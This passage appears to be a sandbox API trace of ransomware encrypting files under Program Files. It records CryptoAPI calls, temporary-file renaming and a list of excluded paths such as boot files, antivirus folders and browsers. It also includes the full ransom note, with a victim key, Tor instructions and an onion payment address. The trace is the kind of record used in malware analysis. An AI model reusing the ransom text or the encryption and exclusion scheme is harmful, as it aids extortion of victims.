out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" [0148.187] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 1 [0148.187] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\.xXB5D0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\.xxb5d0.tmp")) returned 0xb5d0 [0148.187] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\.xXB5D0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\.xxb5d0.tmp"), dwFlags=0x1) returned 0 [0148.188] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\.xXB5D0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\.xxb5d0.tmp")) returned 1 [0148.188] CryptDestroyKey (hKey=0x9ad378) returned 1 [0148.188] wcslen (_String="OK") returned 0x2 [0148.188] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.188] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.188] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0148.188] CryptDestroyHash (hHash=0x9ad238) returned 1 [0148.188] CryptReleaseContext (hProv=0x8e3908, dwFlags=0x0) returned 1 [0148.188] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0148.188] GetLastError () returned 0x12 [0148.188] FindClose (in: hFindFile=0x9ad1f8 | out: hFindFile=0x9ad1f8) returned 1 [0148.188] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0148.188] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.189] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.189] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0148.189] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.189] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.189] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0148.189] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.189] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.189] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*.exe") returned 0 [0148.189] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*.dll") returned 0 [0148.189] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*.lnk") returned 0 [0148.189] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*.bat") returned 0 [0148.189] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*.ini") returned 0 [0148.189] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*.msi") returned 0 [0148.189] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*.scf") returned 0 [0148.189] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*pagefile.sys*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*NTUSER.DAT*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*AppData*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*\\winrar\\*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*\\java\\*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*\\windows\\*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*\\ESET\\*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*\\AVG\\*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*\\AVIRA\\*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*Atheros*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*Realtek*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*bootmgr*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*boot*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*boot*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*CONFIG.SYS*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*IO.SYS*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*MSDOS.SYS*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*NTDETECT.COM*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*ntldr*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*chrome*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*opera*") returned 0 [0148.190] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", pszSpec="*firefox*") returned 0 [0148.190] wcslen (_String="\\\\?\\") returned 0x4 [0148.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad478 [0148.190] wcscmp (_String1=".", _String2=".") returned 0 [0148.190] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.190] wcscmp (_String1="..", _String2=".") returned 1 [0148.190] wcscmp (_String1="..", _String2="..") returned 0 [0148.190] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.190] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0148.190] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0148.190] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0148.190] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0148.190] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0148.190] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0148.190] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0148.190] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0148.190] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0148.191] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0148.191] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui", pszSpec="*") returned 1 [0148.191] strlen (_Str="NMoreira") returned 0x8 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.193] CryptGenRandom (in: 